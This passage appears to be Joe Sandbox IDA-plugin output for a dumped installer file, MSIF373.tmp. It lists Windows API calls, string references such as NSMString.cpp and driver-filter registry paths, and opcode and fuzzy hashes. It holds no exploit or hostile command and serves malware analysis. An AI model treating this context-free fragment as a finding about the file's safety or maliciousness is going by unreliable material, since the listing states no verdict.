                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Interlocked$DecrementIncrement$ErrorFreeHeapLastSleep
                                                                                          • String ID:
                                                                                          • API String ID: 1703371082-0
                                                                                          • Opcode ID: a8846e36f1d2672013c86671ef9388b90e8e78ffbd5cd851e0732bc0a7dbbc0e
                                                                                          • Instruction ID: 6d9033be05f5a37a0bea943de4bd12abd05aeece835b24bed514650c86f2712b
                                                                                          • Opcode Fuzzy Hash: a8846e36f1d2672013c86671ef9388b90e8e78ffbd5cd851e0732bc0a7dbbc0e
                                                                                          • Instruction Fuzzy Hash: E441E2B090034A9FDB109F64D8986BA3FE1BF48310F144859E955EB3A1CB78CC41CB60
                                                                                          APIs
                                                                                          • CreateErrorInfo.OLEAUT32(00000000,?,?,?,005E5F69,?,?), ref: 005E635A
                                                                                          • SysFreeString.OLEAUT32(?), ref: 005E63EF
                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 005E63F9
                                                                                          • SysFreeString.OLEAUT32(?), ref: 005E6403
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeString$CreateErrorInfo
                                                                                          • String ID:
                                                                                          • API String ID: 3175856148-0
                                                                                          • Opcode ID: 662c08e9b34d0a88fff229636e838c02bb9f1f148e6dfed0c3d6a03d6b12e97b
                                                                                          • Instruction ID: eac98506540f6bd5ece8f365803a0b9219e68d932524b644930330b0dd0c7ae1
                                                                                          • Opcode Fuzzy Hash: 662c08e9b34d0a88fff229636e838c02bb9f1f148e6dfed0c3d6a03d6b12e97b
                                                                                          • Instruction Fuzzy Hash: 83312C75300705AFCB14DF6AD880E96BBE9FF983907148819F899CB350DB31E941CBA0
                                                                                          APIs
                                                                                          • RegCloseKey.ADVAPI32(?,DE64E134), ref: 00598C11
                                                                                          • RegCloseKey.ADVAPI32(?,DE64E134), ref: 00598C1B
                                                                                          • RegCloseKey.ADVAPI32(?,DE64E134), ref: 00598C25
                                                                                          • DeleteCriticalSection.KERNEL32 ref: 00598C37
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Close$CriticalDeleteSection
                                                                                          • String ID:
                                                                                          • API String ID: 688834588-0
                                                                                          • Opcode ID: dc674cae351e15b719431fbc6f7048bac9b96c81b7275d06e405b025f6eec58d
                                                                                          • Instruction ID: ec77fbca2d10d7ff6b44027c932a5bfd99c425a98adfa51da5441e51321cef1d
                                                                                          • Opcode Fuzzy Hash: dc674cae351e15b719431fbc6f7048bac9b96c81b7275d06e405b025f6eec58d
                                                                                          • Instruction Fuzzy Hash: 301172B2A04605ABC714DF69DD85E9BF7EDFB49710F044919F819D3740DB34F9008A61
                                                                                          APIs
                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000008,?), ref: 005D48F5
                                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 005D4936
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: EnumOpen
                                                                                          • String ID:
                                                                                          • API String ID: 3231578192-0
                                                                                          • Opcode ID: 169b705c05b9fbb534090ce8124ef5f9d5ec4b56d7e11ccf91935d57e5ae2494
                                                                                          • Instruction ID: 3866092a0947ba4257e6e082277e3a336df46593ba23dbd8a650725d547786d1
                                                                                          • Opcode Fuzzy Hash: 169b705c05b9fbb534090ce8124ef5f9d5ec4b56d7e11ccf91935d57e5ae2494
                                                                                          • Instruction Fuzzy Hash: 13111D75901228ABC725DF65DC94AEABB7DFB49711F04819EF50992200DA705F848FA0
                                                                                          APIs
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,00000000), ref: 005B0EFB
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,00000000), ref: 005B0F20
                                                                                          Strings
                                                                                          • codepage == CP_ACP || codepage == CP_UTF8, xrefs: 005B0EE1
                                                                                          • ..\CTL32\NSMString.cpp, xrefs: 005B0EDC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide
                                                                                          • String ID: ..\CTL32\NSMString.cpp$codepage == CP_ACP || codepage == CP_UTF8
                                                                                          • API String ID: 626452242-274046628
                                                                                          APIs
                                                                                          • DecodePointer.KERNEL32(00000006,005F2EC4,?,005ED3F0), ref: 005F2A32
                                                                                          • TlsFree.KERNEL32(00000016,005F2EC4,?,005ED3F0), ref: 005F2A4C
                                                                                          • DeleteCriticalSection.KERNEL32(00000000,00000000,77485730,?,005F2EC4,?,005ED3F0), ref: 005F91BF
                                                                                          • DeleteCriticalSection.KERNEL32(00000016,77485730,?,005F2EC4,?,005ED3F0), ref: 005F91E9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: CriticalDeleteSection$DecodeFreePointer
                                                                                          • String ID:
                                                                                          • API String ID: 1592661152-0
                                                                                          APIs
                                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 005E0B4C
                                                                                          • OpenProcess.KERNEL32(00001000,00000000,?), ref: 005E0B5C
                                                                                          • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,?), ref: 005E0B75
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 005E0B92
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: Process$CloseFullHandleImageNameOpenQueryThreadWindow
                                                                                          • String ID:
                                                                                          • API String ID: 2863166696-0
                                                                                          APIs
                                                                                          • SetBkColor.GDI32(?,?), ref: 005C2561
                                                                                          • SetRect.USER32(?,?,?,?,?), ref: 005C2579
                                                                                          • ExtTextOutW.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 005C2590
                                                                                          • SetBkColor.GDI32(?,00000000), ref: 005C2598
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: Color$RectText
                                                                                          • String ID:
                                                                                          • API String ID: 4034337308-0
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(00000000,?,005ECFCC,005E7D2D,752F55F0,?,005B97EE,00000000,?,?), ref: 005F2B16
                                                                                            • Part of subcall function 005F29D0: TlsGetValue.KERNEL32(?,005F2B29,?,005B97EE,00000000,?,?), ref: 005F29D9
                                                                                            • Part of subcall function 005F29D0: DecodePointer.KERNEL32(?,005B97EE,00000000,?,?), ref: 005F29EB
                                                                                            • Part of subcall function 005F29D0: TlsSetValue.KERNEL32(00000000,?,005B97EE,00000000,?,?), ref: 005F29FA
                                                                                          • SetLastError.KERNEL32(00000000,?,005B97EE,00000000,?,?), ref: 005F2B80
                                                                                            • Part of subcall function 005F5B13: Sleep.KERNEL32(00000000,00000000,?,?), ref: 005F5B3B
                                                                                          • DecodePointer.KERNEL32(00000000,?,005B97EE,00000000,?,?), ref: 005F2B52
                                                                                            • Part of subcall function 005F2A5E: GetModuleHandleW.KERNEL32(KERNEL32.DLL,00633318,00000008,005F2B66,00000000,00000000,?,005B97EE,00000000,?,?), ref: 005F2A6F
                                                                                            • Part of subcall function 005F2A5E: InterlockedIncrement.KERNEL32(00638D80), ref: 005F2AB0
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F2B68
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: DecodeErrorLastPointerValue$CurrentHandleIncrementInterlockedModuleSleepThread
                                                                                          • String ID:
                                                                                          • API String ID: 68510339-0
                                                                                          APIs
                                                                                          • GetParent.USER32(?), ref: 005B4276
                                                                                          • GetWindowRect.USER32(?,?), ref: 005B4283
                                                                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 005B4292
                                                                                          • MoveWindow.USER32(?,?,?,?,?,?), ref: 005B42AE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: Window$MoveParentPointsRect
                                                                                          • String ID:
                                                                                          • API String ID: 868478971-0
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005BB08E
                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,0063C2FC,?,005CBA0F,00000000,?,005B6949,00000847), ref: 005BB098
                                                                                          • LeaveCriticalSection.KERNEL32(?,?,00000000,?,005CBA0F,00000000,?,005B6949,00000847), ref: 005BB0B8
                                                                                          • LeaveCriticalSection.KERNEL32(?,?,00000000,?,005CBA0F,00000000,?,005B6949,00000847), ref: 005BB0CC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$Leave$CurrentEnterThread
                                                                                          • String ID:
                                                                                          • API String ID: 2905768538-0
                                                                                          APIs
                                                                                          • TlsGetValue.KERNEL32 ref: 005F2CF5
                                                                                          • TlsGetValue.KERNEL32 ref: 005F2D07
                                                                                          • DecodePointer.KERNEL32(00000000), ref: 005F2D1D
                                                                                          • TlsSetValue.KERNEL32(00000016,00000000), ref: 005F2D3A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: Value$DecodePointer
                                                                                          • String ID:
                                                                                          • API String ID: 721062344-0
                                                                                          APIs
                                                                                          • WaitForSingleObject.KERNEL32(?,00002328,?,?,00593B1B), ref: 005AC643
                                                                                          • SetEvent.KERNEL32(?,?,?,00593B1B), ref: 005AC649
                                                                                          • WaitForSingleObject.KERNEL32(?,00002710,?,?,00593B1B), ref: 005AC658
                                                                                          • CloseHandle.KERNEL32(?,?,?,00593B1B), ref: 005AC65E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ObjectSingleWait$CloseEventHandle
                                                                                          • String ID:
                                                                                          • API String ID: 1408678129-0
                                                                                          • Opcode ID: d35a4b1cce8acc477387d484699b935b1eec875a5812849cc6d6b605e63a1412
                                                                                          • Instruction ID: cb20b8788ee7ec1b3c71bd9b23b5879e533c9093e13dc5796c0b2662738ea088
                                                                                          • Opcode Fuzzy Hash: d35a4b1cce8acc477387d484699b935b1eec875a5812849cc6d6b605e63a1412
                                                                                          • Instruction Fuzzy Hash: 2EF089712007009BC324DB69C854A5BFBEAAF9CB10B08890EE15A87691CBB5F440CB60
                                                                                          APIs
                                                                                          • wsprintfW.USER32 ref: 0059A3D6
                                                                                            • Part of subcall function 005B49E0: RegCreateKeyExW.ADVAPI32(00000000,0002001F,00000000,00000000,80000001,?,005959EC,?,00000000,?,00000000,752F55F0,?,?,005959EC,80000001), ref: 005B4A0B
                                                                                            • Part of subcall function 005B4B90: RegQueryValueExW.ADVAPI32(00020019,?,00000000,80000002,80000002,00020019,00000000,752F55F0,00000010,?,?,005963B6,?,?,?,80000002), ref: 005B4BB8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: CreateQueryValuewsprintf
                                                                                          • String ID: SYSTEM\CurrentControlSet\Control\Class\%s$UpperFilters
                                                                                          • API String ID: 198545541-1035810585
                                                                                          • Opcode ID: 273cba56f83bed1a10dc442bf9a0877e8c88ecedf2df33b34b9d1b27e39a51ca
                                                                                          • Instruction ID: 5ee2cfe2207f459c43fa92f1c0431fe47e8a9ae81e038a28e7d10f95098352a8
                                                                                          • Opcode Fuzzy Hash: 273cba56f83bed1a10dc442bf9a0877e8c88ecedf2df33b34b9d1b27e39a51ca
                                                                                          • Instruction Fuzzy Hash: 57712831A002199BCF24DF18CC85AFABBB6FF84304F558599E84A97245E770AF85CBD1
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: wsprintf
                                                                                          • String ID: Client$[%s]%c
                                                                                          • API String ID: 2111968516-4156239840
                                                                                          • Opcode ID: c70111e896fc13c9c877f754616cae23b9f10472fee0af180cfc7cdb88a59e8b
                                                                                          • Instruction ID: 0b3b85ac55a9d8697a83512c64a27a7c5439b9044c3cb7c2acb6a309b82fb30a
                                                                                          • Opcode Fuzzy Hash: c70111e896fc13c9c877f754616cae23b9f10472fee0af180cfc7cdb88a59e8b
                                                                                          • Instruction Fuzzy Hash: D041E575A00206AACF24EF65CC56BE777B5FF98304F0445A4E94DDB256FB70AA80C790
                                                                                          APIs
                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?), ref: 005B4C71
                                                                                          • RegQueryValueExW.ADVAPI32(000007FE,?,00000000,?,00000000,000007FE), ref: 005B4CCC
                                                                                            • Part of subcall function 005E79A7: HeapFree.KERNEL32(00000000,00000000,?,005F2B7C,00000000,?,005B97EE,00000000), ref: 005E79BD
                                                                                            • Part of subcall function 005E79A7: GetLastError.KERNEL32(00000000,?,005F2B7C,00000000,?,005B97EE,00000000), ref: 005E79CF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: QueryValue$ErrorFreeHeapLast
                                                                                          • String ID: Error %d getting %s
                                                                                          • API String ID: 3552358119-2709163689
                                                                                          • Opcode ID: bc6ae68bc78e2b2a80ee470c143d272d2cbda763a1d9b48ec71bb780e3e761e4
                                                                                          • Instruction ID: b1d3680e66246909f4800477e639e3bfbf7beafcfbdc2e876098fc79bfaa41a3
                                                                                          • Opcode Fuzzy Hash: bc6ae68bc78e2b2a80ee470c143d272d2cbda763a1d9b48ec71bb780e3e761e4
                                                                                          • Instruction Fuzzy Hash: C9318671D001289BDB64DB18CC85BEEBBB9BF85300F04C5E9E489A7241DE706E858FE1
                                                                                          APIs
                                                                                          • GetUserNameW.ADVAPI32(?,005BF6B1), ref: 005E24D9
                                                                                            • Part of subcall function 005E1500: LoadLibraryW.KERNEL32(ADVAPI32.DLL,00000105,005E24EA), ref: 005E150E
                                                                                            • Part of subcall function 005E1D50: GetProcAddress.KERNEL32(?,GetNamedSecurityInfoW), ref: 005E1E3C
                                                                                            • Part of subcall function 005E1D50: GetAclInformation.ADVAPI32(?,?,0000000C,00000002,?,?,00000000), ref: 005E1EB2
                                                                                            • Part of subcall function 005E1D50: GetLastError.KERNEL32(?,?,00000000), ref: 005E1EBC
                                                                                            • Part of subcall function 005E1D50: GetLengthSid.ADVAPI32(?,?,?,00000000), ref: 005E1ED7
                                                                                            • Part of subcall function 005E1D50: GetProcessHeap.KERNEL32(00000000,?,?,?,00000000), ref: 005E1EEB
                                                                                            • Part of subcall function 005E1D50: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 005E1EF2
                                                                                            • Part of subcall function 005E1D50: InitializeAcl.ADVAPI32(00000000,?,00000002,?,?,00000000), ref: 005E1EFE
                                                                                            • Part of subcall function 005E1D50: GetLastError.KERNEL32(?,?,00000000), ref: 005E1F08
                                                                                            • Part of subcall function 005E1D50: GetAce.ADVAPI32(?,00000000,?,?,?,00000000), ref: 005E1F49
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: ErrorHeapLast$AddressAllocInformationInitializeLengthLibraryLoadNameProcProcessUser
                                                                                          • String ID: |]b$|]b
                                                                                          • API String ID: 810456405-995414037
                                                                                          • Opcode ID: ee60e52f97e496439aa583889ab10376e5eae78cc20991261269b1a9c99e6c70
                                                                                          • Instruction ID: 1d1b2c715b063b082bb4ea1f3ac511ad413a13716604afecd5550117cfe90512
                                                                                          • Opcode Fuzzy Hash: ee60e52f97e496439aa583889ab10376e5eae78cc20991261269b1a9c99e6c70
                                                                                          • Instruction Fuzzy Hash: 9E417372C01569AACB28EBA4DD49BDEB7B8BF58310F0441D9E94AA7141EB306F44CF90
                                                                                          APIs
                                                                                            • Part of subcall function 005F92EA: EnterCriticalSection.KERNEL32(?,?,?,005F2AA8,0000000D,?,005B97EE,00000000,?,?), ref: 005F9314
                                                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0,006333F0,00000010,005E9517,00632EE8,0000000C,005E9595,?,005B06CD,00000040,?,005B06CD,?,0061DD1C), ref: 005F445D
                                                                                          • EnterCriticalSection.KERNEL32(?,?,005B06CD,?,0061DD1C), ref: 005F4486
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$Enter$CountInitializeSpin
                                                                                          • String ID: /O
                                                                                          • API String ID: 3238990206-273608944
                                                                                          • Opcode ID: 9fc074e91a32a395695fb395a4daf444071f5e14d0443416483acf47fa60b2d1
                                                                                          • Instruction ID: 3c85083b08f22d8627e97ca621629da77fb837517ff4b0174b2e39b9ad7fc3c3
                                                                                          • Opcode Fuzzy Hash: 9fc074e91a32a395695fb395a4daf444071f5e14d0443416483acf47fa60b2d1
                                                                                          • Instruction Fuzzy Hash: E231D23950065A9FCB10DFA9D889B2EBFB1FF49314B548119E285A72A1CB38E902CF50
                                                                                          APIs
                                                                                            • Part of subcall function 005999A0: GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 005999C2
                                                                                            • Part of subcall function 005999A0: LoadLibraryW.KERNEL32(?), ref: 00599A06
                                                                                            • Part of subcall function 005999A0: GetProcAddress.KERNEL32(?,WdfPreDeviceInstall), ref: 00599A20
                                                                                            • Part of subcall function 005999A0: GetProcAddress.KERNEL32(00000000,WdfPostDeviceInstall), ref: 00599A2D
                                                                                            • Part of subcall function 005999A0: GetProcAddress.KERNEL32(?,WdfPreDeviceRemove), ref: 00599A3A
                                                                                            • Part of subcall function 005999A0: GetProcAddress.KERNEL32(?,WdfPostDeviceRemove), ref: 00599A47
                                                                                            • Part of subcall function 005999A0: FreeLibrary.KERNEL32(00000000,?,WdfPostDeviceRemove,?,WdfPreDeviceRemove,?,WdfPreDeviceInstall), ref: 00599A69
                                                                                            • Part of subcall function 00599BE0: wvsprintfW.USER32(?,?,?), ref: 00599C0B
                                                                                          • CloseServiceHandle.ADVAPI32(?), ref: 0059B1B7
                                                                                          Strings
                                                                                          • Error. predeviceInstall failed, e=%d, xrefs: 0059B180
                                                                                          • Error loading wdfCoInstaller, xrefs: 0059B147
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: AddressProc$Library$CloseCurrentDirectoryFreeHandleLoadServicewvsprintf
                                                                                          • String ID: Error loading wdfCoInstaller$Error. predeviceInstall failed, e=%d
                                                                                          • API String ID: 266337823-2211093675
                                                                                          • Opcode ID: 7883fb2dfc886fba775417eb9a0c23c29cab439baf00410ccb6841564abee67a
                                                                                          • Instruction ID: 86fc8f2def4eca50db7e9a30d9eebe3305e05d8ec08fec151dc39d205df10889
                                                                                          • Opcode Fuzzy Hash: 7883fb2dfc886fba775417eb9a0c23c29cab439baf00410ccb6841564abee67a
                                                                                          • Instruction Fuzzy Hash: CC219271B056095BEB14EBB5AD6AABF77A9AF84700F04415EE80A83281EF65DA00C6D1
                                                                                          APIs
                                                                                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 005C8DD7
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 005C8E1E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: EnvironmentExpandFileModuleNameStrings
                                                                                          • String ID: :
                                                                                          • API String ID: 2034136378-336475711
                                                                                          • Opcode ID: 17dc2eb56db30246eb89c4718d9ff0ef821f407767a9d4e5329f487016cbf052
                                                                                          • Instruction ID: d0c744f9a53a1a53cead590d14748dcc766e31dafad05c62a931e99d8286d813
                                                                                          • Opcode Fuzzy Hash: 17dc2eb56db30246eb89c4718d9ff0ef821f407767a9d4e5329f487016cbf052
                                                                                          • Instruction Fuzzy Hash: F321D6749002199ECB24EBA4CC0AFFA7B78FF84304F448599E60957291EF745B84CBA5
                                                                                          APIs
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Installer\MSIF373.tmp,00000104), ref: 005FA61F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FileModuleName
                                                                                          • String ID: C:\Windows\Installer\MSIF373.tmp$`4d
                                                                                          • API String ID: 514040917-4039923104
                                                                                          • Opcode ID: bb48bfea3620c48ce55f5e9ba3d2b16ed7951e0e7e58ff9b809d70e35cded293
                                                                                          • Instruction ID: 35899dfb50af1b77b553600e3547fbf060ebdd4a3d47e03824f5cd7d911ed886
                                                                                          • Opcode Fuzzy Hash: bb48bfea3620c48ce55f5e9ba3d2b16ed7951e0e7e58ff9b809d70e35cded293
                                                                                          • Instruction Fuzzy Hash: 8E1196B6A0021DAF9B14DFA4ECC48BE7BEDFB45334738052AF615D3294EA349A058752
                                                                                          APIs
                                                                                          • RegQueryValueExW.ADVAPI32(00020019,?,00000000,DE64E134,00000000,00020019,?,00000000), ref: 005B4A70
                                                                                            • Part of subcall function 005B4640: wvsprintfW.USER32(?,00596384,?), ref: 005B466B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: QueryValuewvsprintf
                                                                                          • String ID: ($Error %d getting %s
                                                                                          • API String ID: 141982866-3697087921
                                                                                          • Opcode ID: cac4099444449e47fb581e0138e6240574b048ce990aefc41755ee4423fd2dfe
                                                                                          • Instruction ID: 27a12d50aff28e46c8fb9772237b6ed81df25711850002afc7cc42c17bfbbdc1
                                                                                          • Opcode Fuzzy Hash: cac4099444449e47fb581e0138e6240574b048ce990aefc41755ee4423fd2dfe
                                                                                          • Instruction Fuzzy Hash: 7E11C672E01108ABDB14EFA9DD46DFFB7B9FB84710F04811AF806A7241DA70A9048BA1
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
